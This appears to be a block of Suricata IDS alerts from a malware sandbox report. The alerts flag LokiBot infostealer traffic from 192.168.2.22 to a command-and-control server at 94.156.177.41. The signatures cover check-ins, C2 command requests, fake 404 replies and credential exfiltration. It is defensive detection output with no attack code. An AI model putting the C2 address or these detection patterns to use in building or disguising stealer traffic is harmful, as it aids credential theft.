                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49253
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49165 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49170 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49166 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49166 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49244 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49166 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49212
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49244 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49170
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49165 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49250
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49171
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49244 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49166 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49191
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49209
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49168
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49172
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49183
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49271
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49255 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49248 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49201
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49204
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49220
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49255 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49273 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49248 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49255 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49236
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49181
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49255 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49248 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49243
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49224
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49256
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49244
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49273 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
